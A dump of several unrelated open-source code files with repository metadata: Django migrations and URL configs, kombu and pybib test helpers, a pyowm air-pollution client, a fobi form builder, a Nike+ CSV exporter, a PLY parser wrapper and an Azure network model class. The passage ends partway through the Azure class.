class Migration(migrations.Migration):
dependencies = [
('share', '0001_initial'),
('djcelery', '0001_initial'),
]
operations = [
migrations.RunPython(
code=share.robot.RobotUserMigration('edu.vivo'),
),
migrations.RunPython(
code=share.robot.RobotOauthTokenMigration('edu.vivo'),
),
migrations.RunPython(
code=share.robot.RobotScheduleMigration('edu.vivo'),
),
]
| {
"content_hash": "ffba837bdbd0ec44995d9e9e0f624a01",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 66,
"avg_line_length": 24.041666666666668,
"alnum_prop": 0.6048526863084922,
"repo_name": "zamattiac/SHARE",
"id": "7cc5dc748d43a7186350abfb99b65cae1c6881fd",
"size": "649",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "providers/edu/vivo/migrations/0001_initial.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3690"
},
{
"name": "HTML",
"bytes": "1582"
},
{
"name": "Python",
"bytes": "1517988"
},
{
"name": "Shell",
"bytes": "633"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
import importlib
from contextlib import contextmanager
from case import (
ANY, Case, ContextMock, MagicMock, Mock,
call, mock, skip, patch, sentinel,
)
__all__ = [
'ANY', 'Case', 'ContextMock', 'MagicMock', 'Mock',
'call', 'mock', 'skip', 'patch', 'sentinel',
'HubCase', 'PromiseMock', 'MockPool', 'set_module_symbol',
]
class HubCase(Case):
def setUp(self):
from kombu.async import Hub, get_event_loop, set_event_loop
self._prev_hub = get_event_loop()
self.hub = Hub()
set_event_loop(self.hub)
super(HubCase, self).setUp()
def tearDown(self):
try:
super(HubCase, self).tearDown()
finally:
from kombu.async import set_event_loop
if self._prev_hub is not None:
set_event_loop(self._prev_hub)
def PromiseMock(*args, **kwargs):
m = Mock(*args, **kwargs)
def on_throw(exc=None, *args, **kwargs):
if exc:
raise exc
raise
m.throw.side_effect = on_throw
m.set_error_state.side_effect = on_throw
m.throw1.side_effect = on_throw
return m
class MockPool(object):
def __init__(self, value=None):
self.value = value or ContextMock()
def acquire(self, **kwargs):
return self.value
@contextmanager
def set_module_symbol(module, key, value):
module = importlib.import_module(module)
prev = getattr(module, key)
setattr(module, key, value)
try:
yield
finally:
setattr(module, key, prev)
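# Illustrative sketch, not part of the original module: set_module_symbol
# temporarily replaces a module-level attribute and restores it on exit. The
# patched module and value below are placeholders chosen for the example.
def _example_set_module_symbol():
    import os
    with set_module_symbol('os', 'sep', '<patched>'):
        assert os.sep == '<patched>'
    assert os.sep != '<patched>'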
| {
"content_hash": "23566da12261a3a6557198f21e455a31",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 67,
"avg_line_length": 23.441176470588236,
"alnum_prop": 0.6041405269761606,
"repo_name": "Elastica/kombu",
"id": "057229e165f067e2d6ecb277ba260339f4167e83",
"size": "1594",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kombu/tests/case.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1842"
},
{
"name": "Makefile",
"bytes": "1514"
},
{
"name": "PowerShell",
"bytes": "2786"
},
{
"name": "Python",
"bytes": "1017395"
},
{
"name": "Shell",
"bytes": "1955"
}
],
"symlink_target": ""
} |
try:
from urllib.error import HTTPError, URLError
from urllib.parse import urlencode
except ImportError:
from urllib2 import HTTPError, URLError
from urllib import urlencode
import socket
from pyowm.exceptions import api_call_error, not_found_error, unauthorized_error
from pyowm.utils import timeformatutils
from pyowm.webapi25.configuration25 import ROOT_POLLUTION_API_URL, \
CO_INDEX_URL, OZONE_URL
class AirPollutionHttpClient(object):
"""
An HTTP client class for the OWM Air Pollution web API. The class can
leverage a caching mechanism
:param API_key: a Unicode object representing the OWM Air Pollution web API key
:type API_key: Unicode
:param cache: an *OWMCache* concrete instance that will be used to \
cache OWM Air Pollution web API responses.
:type cache: an *OWMCache* concrete instance
"""
def __init__(self, API_key, cache):
self._API_key = API_key
self._cache = cache
self._API_root_URL = ROOT_POLLUTION_API_URL
def _trim_to(self, date_object, interval):
if interval == 'minute':
return date_object.strftime('%Y-%m-%dT%H:%MZ')
elif interval == 'hour':
return date_object.strftime('%Y-%m-%dT%HZ')
elif interval == 'day':
return date_object.strftime('%Y-%m-%dZ')
elif interval == 'month':
return date_object.strftime('%Y-%mZ')
elif interval == 'year':
return date_object.strftime('%YZ')
else:
raise ValueError("The interval provided for the search "
"window is invalid")
def _lookup_cache_or_invoke_API(self, cache, API_full_url, timeout):
cached = cache.get(API_full_url)
if cached:
return cached
else:
try:
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
response = urlopen(API_full_url, None, timeout)
except HTTPError as e:
if '401' in str(e):
raise unauthorized_error.UnauthorizedError('Invalid API key')
if '404' in str(e):
raise not_found_error.NotFoundError('The resource was not found')
if '502' in str(e):
raise api_call_error.BadGatewayError(str(e), e)
raise api_call_error.APICallError(str(e), e)
except URLError as e:
raise api_call_error.APICallError(str(e), e)
else:
data = response.read().decode('utf-8')
cache.set(API_full_url, data)
return data
def get_coi(self, params_dict, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
"""
Invokes the CO Index endpoint
:param params_dict: dict of parameters
:param timeout: how many seconds to wait for connection establishment \
(defaults to ``socket._GLOBAL_DEFAULT_TIMEOUT``)
:type timeout: int
:returns: a string containing raw JSON data
:raises: *ValueError*, *APICallError*
"""
lat = str(params_dict['lat'])
lon = str(params_dict['lon'])
start = params_dict['start']
interval = params_dict['interval']
# build request URL
url_template = '%s%s/%s,%s/%s.json?appid=%s'
if start is None:
timeref = 'current'
else:
if interval is None:
timeref = self._trim_to(
timeformatutils.to_date(start), 'year')
else:
timeref = self._trim_to(
timeformatutils.to_date(start), interval)
url = url_template % (ROOT_POLLUTION_API_URL, CO_INDEX_URL, lat, lon,
timeref, self._API_key)
return self._lookup_cache_or_invoke_API(self._cache, url, timeout)
def get_o3(self, params_dict, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
"""
Invokes the O3 Index endpoint
:param params_dict: dict of parameters
:param timeout: how many seconds to wait for connection establishment \
(defaults to ``socket._GLOBAL_DEFAULT_TIMEOUT``)
:type timeout: int
:returns: a string containing raw JSON data
:raises: *ValueError*, *APICallError*
"""
lat = str(params_dict['lat'])
lon = str(params_dict['lon'])
start = params_dict['start']
interval = params_dict['interval']
# build request URL
url_template = '%s%s/%s,%s/%s.json?appid=%s'
if start is None:
timeref = 'current'
else:
if interval is None:
timeref = self._trim_to(
timeformatutils.to_date(start), 'year')
else:
timeref = self._trim_to(
timeformatutils.to_date(start), interval)
url = url_template % (ROOT_POLLUTION_API_URL, OZONE_URL, lat, lon,
timeref, self._API_key)
return self._lookup_cache_or_invoke_API(self._cache, url, timeout)
def __repr__(self):
return "<%s.%s - cache=%s>" % \
(__name__, self.__class__.__name__, repr(self._cache)) | {
"content_hash": "1ebbe5472846914c187d5511029238bf",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 85,
"avg_line_length": 37.19580419580419,
"alnum_prop": 0.5653318292912202,
"repo_name": "mpvoss/RickAndMortyWeatherTweets",
"id": "def200eae78dadf892169dd208308ac02212bcbf",
"size": "5358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "env/lib/python3.5/site-packages/pyowm/commons/airpollution_client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13428"
}
],
"symlink_target": ""
} |
import pytest
import requests
import requests_mock
from pybib import utils
from hamcrest import *
class MockRequest:
def __init__(self, code):
self.code = code
@property
def status_code(self):
return self.code
def test_handle_status_code_200():
utils.handle_status_code(MockRequest(200))
def test_handle_status_code_404():
with pytest.raises(SystemExit):
utils.handle_status_code(MockRequest(404))
def test_handle_status_code_unknown():
with pytest.raises(SystemExit):
utils.handle_status_code(MockRequest(1))
def test_search():
search_json_response = """
{
"message-version": "1.0.0",
"message": {
"facets": {},
"query": {
"start-index": 0,
"search-terms": "test"
},
"total-results": 1,
"items": [{
"source": "CrossRef",
"title": ["Test Citation"],
"type": "dissertation", "URL": "http://dx.doi.org/test.doi",
"deposited": {"timestamp": 1000, "date-parts": [[2015, 1, 1]]},
"container-title": [],
"author": [{"given": "Test", "affiliation": [], "family": "Test"}],
"reference-count": 0,
"member": "http://id.crossref.org/member/xxx",
"subtitle": [],
"indexed": { "timestamp": 1000, "date-parts": [[2015, 1, 1]] },
"prefix": "http://id.crossref.org/prefix/test",
"publisher": "Test Publisher",
"score": 1.0,
"DOI": "test.doi",
"issued": { "date-parts": [[]] }
}]
}
}
"""
with requests_mock.mock() as m:
m.get('http://api.crossref.org/works', text=search_json_response)
entries = utils.search('test.doi')
print(entries)
assert_that(len(entries), equal_to(1))
entry = entries[0]
assert_that(entry["title"], equal_to(["Test Citation"]))
def test_get_bibtex():
with requests_mock.mock() as m:
m.get('http://dx.doi.org/test.doi', text='abc')
entry = utils.get_bibtex('test.doi')
assert_that(entry, equal_to('abc'))
| {
"content_hash": "53557ec49d36d4b75c0d55f27a61e874",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 83,
"avg_line_length": 29.31578947368421,
"alnum_prop": 0.5175044883303411,
"repo_name": "jgilchrist/pybib",
"id": "d8196798a2a3d7a36f4f4efdc9a227198050cafa",
"size": "2228",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "175"
},
{
"name": "Python",
"bytes": "12455"
}
],
"symlink_target": ""
} |
from django.forms.forms import BaseForm
from django.forms.widgets import media_property
from django.http import HttpResponseRedirect
from six import with_metaclass
from .constants import WIZARD_TYPE_COOKIE, WIZARD_TYPE_SESSION
from formtools.wizard.views import (
CookieWizardView,
SessionWizardView,
WizardView,
)
from collections import OrderedDict
from django.urls import reverse
__title__ = 'fobi.dynamic'
__author__ = 'Artur Barseghyan <[email protected]>'
__copyright__ = '2014-2017 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = (
'assemble_form_class',
'assemble_form_wizard_class',
)
# ****************************************************************************
# ****************************************************************************
# **************************** Form generator ********************************
# ****************************************************************************
# ****************************************************************************
def assemble_form_class(form_entry, base_class=BaseForm, request=None,
origin=None, origin_kwargs_update_func=None,
origin_return_func=None, form_element_entries=None,
get_form_field_instances_kwargs={}):
"""Assemble a form class by given entry.
:param form_entry:
:param base_class:
:param django.http.HttpRequest request:
:param string origin:
:param callable origin_kwargs_update_func:
:param callable origin_return_func:
:param iterable form_element_entries: If given, used instead of
``form_entry.formelemententry_set.all`` (no additional database hit).
:param dict get_form_field_instances_kwargs: To be passed as **kwargs to
the :method:`get_form_field_instances_kwargs`.
"""
if form_element_entries is None:
form_element_entries = form_entry.formelemententry_set.all()
# DeclarativeFieldsMetaclass
class DeclarativeFieldsMetaclass(type):
"""Declarative fields meta class.
Copied from ``django.forms.forms.DeclarativeFieldsMetaclass``.
Metaclass that converts Field attributes to a dictionary called
`base_fields`, taking into account parent class 'base_fields' as well.
"""
def __new__(cls, name, bases, attrs):
"""New."""
base_fields = []
for creation_counter, form_element_entry \
in enumerate(form_element_entries):
plugin = form_element_entry.get_plugin(request=request)
# We simply make sure the plugin exists. We don't handle
# exceptions relate to the non-existent plugins here. They
# are instead handled in registry.
if plugin:
plugin_form_field_instances = \
plugin._get_form_field_instances(
form_element_entry=form_element_entry,
origin=origin,
kwargs_update_func=origin_kwargs_update_func,
return_func=origin_return_func,
extra={'counter': creation_counter},
request=request,
form_entry=form_entry,
form_element_entries=form_element_entries,
**get_form_field_instances_kwargs
)
for form_field_name, form_field_instance \
in plugin_form_field_instances:
base_fields.append(
(form_field_name, form_field_instance)
)
attrs['base_fields'] = OrderedDict(base_fields)
new_class = super(DeclarativeFieldsMetaclass, cls).__new__(
cls, name, bases, attrs
)
if 'media' not in attrs:
new_class.media = media_property(new_class)
return new_class
# DynamicForm
class DynamicForm(with_metaclass(DeclarativeFieldsMetaclass, base_class)):
"""Dynamically created form element plugin class."""
# Finally, return the DynamicForm
return DynamicForm
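# Illustrative sketch, not part of this module: a caller typically assembles
# the class from a saved FormEntry and instantiates it like any Django form.
# The view signature and its request/form_entry arguments are placeholders.
def _example_view(request, form_entry):
    form_cls = assemble_form_class(form_entry, request=request)
    form = form_cls(data=request.POST or None)
    if form.is_valid():
        return form.cleaned_data
    return form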
| {
"content_hash": "1e509e83f34be902b7ea9c6aaeb32b16",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 78,
"avg_line_length": 39.03636363636364,
"alnum_prop": 0.5407545412203074,
"repo_name": "mansonul/events",
"id": "bac27e246b0cd33f7972f9da6b43fd8e20d01c3a",
"size": "4294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "events/dynamic.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "90251"
},
{
"name": "HTML",
"bytes": "186225"
},
{
"name": "JavaScript",
"bytes": "43221"
},
{
"name": "Python",
"bytes": "804726"
},
{
"name": "Shell",
"bytes": "4196"
}
],
"symlink_target": ""
} |
"""toger URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from polls import views
app_name = 'polls'
urlpatterns = [
# ex: /polls/
url(r'^$',views.IndexView.as_view(), name= 'index'),
# ex: /polls/5/
url(r'^(?P<pk>[0-9]+)/$',views.DetailView.as_view(), name= 'detail'),
# ex: /polls/5/results/
url(r'^(?P<pk>[0-9]+)/results/$',views.ResultsView.as_view(), name= 'results'),
# ex: /polls/5/vote/
url(r'^(?P<question_id>[0-9]+)/vote/$',views.vote, name= 'vote'),
]
| {
"content_hash": "fec18ba202a274d7b3417b3c4e0d689d",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 83,
"avg_line_length": 38.58620689655172,
"alnum_prop": 0.646112600536193,
"repo_name": "MarsBighead/mustang",
"id": "9b2bf9a563e94385c72dec2314c745ffa660cccd",
"size": "1119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/polls/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "622"
},
{
"name": "C++",
"bytes": "15533"
},
{
"name": "CSS",
"bytes": "2525"
},
{
"name": "Dockerfile",
"bytes": "499"
},
{
"name": "Erlang",
"bytes": "5855"
},
{
"name": "Go",
"bytes": "3879"
},
{
"name": "HTML",
"bytes": "3879"
},
{
"name": "Java",
"bytes": "541"
},
{
"name": "JavaScript",
"bytes": "7858"
},
{
"name": "Julia",
"bytes": "2223"
},
{
"name": "Makefile",
"bytes": "650"
},
{
"name": "Modula-3",
"bytes": "43"
},
{
"name": "PHP",
"bytes": "771"
},
{
"name": "PLpgSQL",
"bytes": "4642"
},
{
"name": "Perl",
"bytes": "46253"
},
{
"name": "Python",
"bytes": "110755"
},
{
"name": "Raku",
"bytes": "378"
},
{
"name": "Shell",
"bytes": "22680"
}
],
"symlink_target": ""
} |
"""
Export nikeplus data to csv or print to screen
"""
import argparse
from collections import namedtuple
import csv
from datetime import datetime
import json
import os.path
import sys
import time
import urllib2
# FIXME: Could use descriptors here:
# - Could hold: default value, api name, pretty name, and conversion func
# Key = our internal name
# Value = nike plus API name (None for custom, not represented in API)
name_to_api = {'calories': 'calories',
'fuel': 'fuel',
'steps': 'steps',
'device': 'deviceType',
'duration': 'duration',
'pace': None,
'kilometers': None,
'miles': None,
# Time in iso format as string
'start_time': 'startTime',
# Redundant now but easier to include since it maps directly to
# the API.
'distance': 'distance'}
NikePlusActivity = namedtuple('NikePlusActivity', name_to_api.keys())
km_to_mi = lambda distance: float(distance) * 0.621371
DATE_FMT = '%Y-%m-%d'
def _validate_date_str(str_):
"""Validate str as a date and return string version of date"""
if not str_:
return None
# Convert to datetime so we can validate it's a real date that exists then
# convert it back to the string.
try:
date = datetime.strptime(str_, DATE_FMT)
except ValueError:
msg = 'Invalid date format, should be YYYY-MM-DD'
raise argparse.ArgumentTypeError(msg)
return date.strftime(DATE_FMT)
def _parse_args():
"""Parse sys.argv arguments"""
token_file = os.path.expanduser('~/.nikeplus_access_token')
parser = argparse.ArgumentParser(description='Export NikePlus data to CSV')
parser.add_argument('-t', '--token', required=False, default=None,
help=('Access token for API, can also store in file %s'
' to avoid passing via command line' % (token_file)))
parser.add_argument('-s', '--since', type=_validate_date_str,
help=('Only process entries starting with YYYY-MM-DD '
'and newer'))
args = vars(parser.parse_args())
if args['token'] is None:
try:
with open(token_file, 'r') as _file:
access_token = _file.read().strip()
except IOError:
print 'Must pass access token via command line or store in file %s' % (
token_file)
sys.exit(-1)
args['token'] = access_token
return args
def calculate_mile_pace(duration, miles):
pace = ''
sp = duration.split(':')
if len(sp) == 3:
duration_seconds = int(sp[0]) * 60 * 60 + int(sp[1]) * 60 + int(sp[2])
seconds_per_mile = 0.0
if miles:
seconds_per_mile = duration_seconds / miles
hours, remainder = divmod(seconds_per_mile, 3600)
minutes, seconds = divmod(remainder, 60)
pace = '(%.0f\'%02.0f/mi)' % (minutes, seconds)
return pace
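# Worked example (illustrative, not from the original source): a 30 minute
# run recorded as '0:30:00' over 3.1 miles is 1800 s / 3.1 mi ~= 580.6 s/mi,
# which the format string above renders as "(9'41/mi)".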
def decode_activity(activity):
metrics = activity.get('metricSummary')
api_values = {}
for pretty_name, api_name in name_to_api.iteritems():
if api_name is not None:
# Values can be in 1 of 2 dicts, metric sub-dict or 'root' activity
# dict
try:
api_values[pretty_name] = metrics[api_name]
except KeyError:
api_values[pretty_name] = activity.get(api_name, None)
# Custom values/sanitizing
# remove milliseconds
api_values['duration'] = api_values['duration'].partition('.')[0]
    # Distance is redundant with kilometers, but both are kept because the
    # name_to_api dict is used to pull data from the API and map it onto the
    # named tuple dynamically. Dropping distance here while keeping that
    # dynamic mapping would mean removing it manually in several places,
    # which feels hack-ish.
api_values['miles'] = km_to_mi(api_values['distance'])
api_values['kilometers'] = api_values['distance']
api_values['pace'] = calculate_mile_pace(api_values['duration'],
api_values['miles'])
activity = NikePlusActivity(**api_values)
return activity
def get_activities(access_token, start_date=None):
base_url = 'https://api.nike.com'
url = '/v1/me/sport/activities?access_token=%s' % access_token
if start_date is not None:
# FIXME: use re module to assert that it's yyyy-mm-dd
end_date = datetime.today().strftime(DATE_FMT)
url = '%s&startDate=%s&endDate=%s' % (url, start_date, end_date)
# weird required headers, blah.
headers = {'appid':'fuelband', 'Accept':'application/json'}
current_month = None
while url:
req = urllib2.Request('%s%s' % (base_url, url), None, headers)
try:
r = urllib2.urlopen(req)
except urllib2.HTTPError as err:
print 'Failed sending request to "%s":\n%s\n%s\n\n' % (url, err,
err.read())
raise err
resp = json.loads(r.read())
r.close()
data = resp.get('data')
if data is None:
raise StopIteration
for item in resp.get('data'):
activity = decode_activity(item)
yield activity
# pagination
url = None
if resp.get('paging') and resp.get('paging').get('next'):
url = resp.get('paging').get('next')
def main():
args = _parse_args()
activities = get_activities(args['token'], args['since'])
# Print header
activity = activities.next()
print ','.join(activity._fields)
# FIXME: Bug in nikeplus API, if you send request with start/end you'll
# get in an infinite loop telling a new offset for data that doesn't
# exist. For example:
# Request data for 2013-08-15 - 2013-09-01
# Only have data for 2013-08-15 and 2013-08-16
# API keeps returning a new offset each time for 5 more days but
# it continues to return data for the same two days and never stops.
# See nikeplus_api_bug.txt for detailed output of this scenario.
seen_dates = set()
writer = csv.writer(sys.stdout)
for activity in activities:
activity = activity._asdict()
values = [str(value) for value in activity.values()]
# Already seen this date, API is returning duplicate data so must mean
# we've been through it all.
if activity['start_time'] in seen_dates:
break
seen_dates.add(activity['start_time'])
writer.writerow(values)
if __name__ == '__main__':
main()
| {
"content_hash": "5d5a65f6eff4f1a3ee36e187883404b8",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 83,
"avg_line_length": 31.493087557603687,
"alnum_prop": 0.5845771144278606,
"repo_name": "durden/nikeplus",
"id": "f5b577ff7be4bcbde82a1b3e16a10f93a8dba53c",
"size": "6858",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nikeplusapi/export.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8219"
}
],
"symlink_target": ""
} |
"""Location helpers for Home Assistant."""
from blumate.const import ATTR_LATITUDE, ATTR_LONGITUDE
from blumate.core import State
from blumate.util import location as loc_util
def has_location(state):
"""Test if state contains a valid location."""
return (isinstance(state, State) and
isinstance(state.attributes.get(ATTR_LATITUDE), float) and
isinstance(state.attributes.get(ATTR_LONGITUDE), float))
def closest(latitude, longitude, states):
"""Return closest state to point."""
with_location = [state for state in states if has_location(state)]
if not with_location:
return None
return min(
with_location,
key=lambda state: loc_util.distance(
latitude, longitude, state.attributes.get(ATTR_LATITUDE),
state.attributes.get(ATTR_LONGITUDE))
)
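# Illustrative sketch, not part of this module: picking the state nearest to a
# point. The entity id, coordinates and attribute values are invented for the
# example.
def _example_closest():
    state = State('device_tracker.paulus', 'home',
                  {ATTR_LATITUDE: 52.3731, ATTR_LONGITUDE: 4.8922})
    return closest(52.36, 4.88, [state])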
| {
"content_hash": "bbb05f6aa6fa346f5362815b1d1c1b07",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 70,
"avg_line_length": 31.48148148148148,
"alnum_prop": 0.6835294117647058,
"repo_name": "bdfoster/blumate",
"id": "9df7e6d6bfd8130b8d7145c772167dd8eac476d0",
"size": "850",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blumate/helpers/location.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1309487"
},
{
"name": "JavaScript",
"bytes": "10846"
},
{
"name": "Python",
"bytes": "2460958"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "6407"
}
],
"symlink_target": ""
} |
import sys
import os
import os.path
import inspect
from ply import lex, yacc
class Parser(object):
"""Wrapper object for PLY lexer/parser."""
exception = ValueError
@classmethod
def _table_name(cls, suffix, relative=False):
"""Return the module name for PLY's parsetab file."""
mname = inspect.getmodule(cls).__name__ + '_' + suffix
if relative:
mname = mname.split('.')[-1]
return mname
@classmethod
def _write_tables(cls):
"""Write parser table (for distribution purposes)."""
path = inspect.getfile(cls)
parent = os.path.split(path)[0]
# Need to change directories to get the file written at the right
# location.
cwd = os.getcwd()
os.chdir(parent)
tabname = cls._table_name('lex', relative=True)
lex.lex(object=cls, lextab=tabname, optimize=True, debug=False)
tabname = cls._table_name('tab', relative=True)
yacc.yacc(module=cls, tabmodule=tabname, optimize=True, debug=False)
os.chdir(cwd)
def parse(self, input, fname=None, debug=False):
optimize = not debug
tabname = self._table_name('lex')
lexer = lex.lex(object=self, lextab=tabname,
optimize=optimize, debug=debug)
if hasattr(input, 'read'):
input = input.read()
lexer.input(input)
self._input = input
self._fname = fname
tabname = self._table_name('tab')
parser = yacc.yacc(module=self, tabmodule=tabname,
optimize=optimize, debug=debug)
parsed = parser.parse(lexer=lexer, tracking=True)
return parsed
def _position(self, o):
if hasattr(o, 'lineno') and hasattr(o, 'lexpos'):
lineno = o.lineno
lexpos = o.lexpos
pos = self._input.rfind('\n', 0, lexpos)
column = lexpos - pos
else:
lineno = None
column = None
return lineno, column
def t_ANY_error(self, t):
err = self.exception()
msg = 'illegal token'
if self._fname:
err.fname = self._fname
msg += ' in file %s' % self._fname
lineno, column = self._position(t)
if lineno is not None and column is not None:
msg += ' at %d:%d' % (lineno, column)
err.lineno = lineno
err.column = column
err.args = (msg,)
raise err
def p_error(self, p):
err = self.exception()
msg = 'syntax error'
if self._fname:
err.fname = self._fname
msg += ' in file %s' % self._fname
lineno, column = self._position(p)
if lineno is not None and column is not None:
msg += ' at %d:%d' % (lineno, column)
err.lineno = lineno
err.column = column
err.args = (msg,)
raise err
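# Illustrative sketch, not part of this module: a concrete subclass supplies
# PLY token and grammar rules, and Parser.parse() wires them to lex/yacc and
# attaches positions to errors. The toy grammar below (a single integer) is
# an assumption made for the example.
class _IntParser(Parser):
    tokens = ('NUMBER',)
    t_ignore = ' \t\n'
    def t_NUMBER(self, t):
        r'\d+'
        t.value = int(t.value)
        return t
    def p_start(self, p):
        'start : NUMBER'
        p[0] = p[1]
# Under these assumptions, _IntParser().parse('42') would return 42.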
| {
"content_hash": "0247af033851db1861cbad5b9fb6f10d",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 76,
"avg_line_length": 32.922222222222224,
"alnum_prop": 0.5420182247721903,
"repo_name": "geertj/argproc",
"id": "a748c97e7c11b44128345fbf86d529fd8dc817d7",
"size": "3283",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/argproc/plyparse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "48169"
}
],
"symlink_target": ""
} |
import _include
from co8Util.Logger import Logger
from co8Util.PersistentData import Co8PersistentData
print "initializing _co8init.py\n"
def save(savename):
## logger = Logger(__name__)
## logger.logme("save:" + savename)
print "Executing Co8 Save Hook\n"
Co8PersistentData.save(savename)
def load(savename):
## logger = Logger(__name__)
## logger.logme("load:" + savename)
Co8PersistentData.load(savename)
def init():
pass
| {
"content_hash": "e001bb081bb69b08a9ad4e8a9101c497",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 52,
"avg_line_length": 24.666666666666668,
"alnum_prop": 0.7207207207207207,
"repo_name": "GrognardsFromHell/TemplePlus",
"id": "1f117d6d0980f7af168858aac5337f3043ef6232",
"size": "524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tpdatasrc/co8fixes/scr/_co8init.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "683"
},
{
"name": "C",
"bytes": "629718"
},
{
"name": "C#",
"bytes": "167885"
},
{
"name": "C++",
"bytes": "10018792"
},
{
"name": "CMake",
"bytes": "91980"
},
{
"name": "CSS",
"bytes": "1292"
},
{
"name": "HLSL",
"bytes": "18884"
},
{
"name": "HTML",
"bytes": "433942"
},
{
"name": "PowerShell",
"bytes": "5374"
},
{
"name": "Python",
"bytes": "2850350"
}
],
"symlink_target": ""
} |
from .resource import Resource
class VirtualNetworkGatewayConnection(Resource):
"""A common class for general resource information.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param authorization_key: The authorizationKey.
:type authorization_key: str
:param virtual_network_gateway1:
:type virtual_network_gateway1:
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGateway
:param virtual_network_gateway2:
:type virtual_network_gateway2:
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGateway
:param local_network_gateway2:
:type local_network_gateway2:
~azure.mgmt.network.v2016_09_01.models.LocalNetworkGateway
:param connection_type: Gateway connection type. Possible values are:
     'IPsec', 'Vnet2Vnet', 'ExpressRoute', and 'VPNClient'. Possible values
include: 'IPsec', 'Vnet2Vnet', 'ExpressRoute', 'VPNClient'
:type connection_type: str or
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGatewayConnectionType
:param routing_weight: The routing weight.
:type routing_weight: int
:param shared_key: The IPSec shared key.
:type shared_key: str
:ivar connection_status: Virtual network Gateway connection status.
Possible values are 'Unknown', 'Connecting', 'Connected' and
'NotConnected'. Possible values include: 'Unknown', 'Connecting',
'Connected', 'NotConnected'
:vartype connection_status: str or
~azure.mgmt.network.v2016_09_01.models.VirtualNetworkGatewayConnectionStatus
:ivar tunnel_connection_status: Collection of all tunnels' connection
health status.
:vartype tunnel_connection_status:
list[~azure.mgmt.network.v2016_09_01.models.TunnelConnectionHealth]
:ivar egress_bytes_transferred: The egress bytes transferred in this
connection.
:vartype egress_bytes_transferred: long
:ivar ingress_bytes_transferred: The ingress bytes transferred in this
connection.
:vartype ingress_bytes_transferred: long
:param peer: The reference to peerings resource.
:type peer: ~azure.mgmt.network.v2016_09_01.models.SubResource
:param enable_bgp: EnableBgp flag
:type enable_bgp: bool
:param resource_guid: The resource GUID property of the
VirtualNetworkGatewayConnection resource.
:type resource_guid: str
:ivar provisioning_state: The provisioning state of the
VirtualNetworkGatewayConnection resource. Possible values are: 'Updating',
'Deleting', and 'Failed'.
:vartype provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated.
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'virtual_network_gateway1': {'required': True},
'connection_type': {'required': True},
'connection_status': {'readonly': True},
'tunnel_connection_status': {'readonly': True},
'egress_bytes_transferred': {'readonly': True},
'ingress_bytes_transferred': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'authorization_key': {'key': 'properties.authorizationKey', 'type': 'str'},
'virtual_network_gateway1': {'key': 'properties.virtualNetworkGateway1', 'type': 'VirtualNetworkGateway'},
'virtual_network_gateway2': {'key': 'properties.virtualNetworkGateway2', 'type': 'VirtualNetworkGateway'},
'local_network_gateway2': {'key': 'properties.localNetworkGateway2', 'type': 'LocalNetworkGateway'},
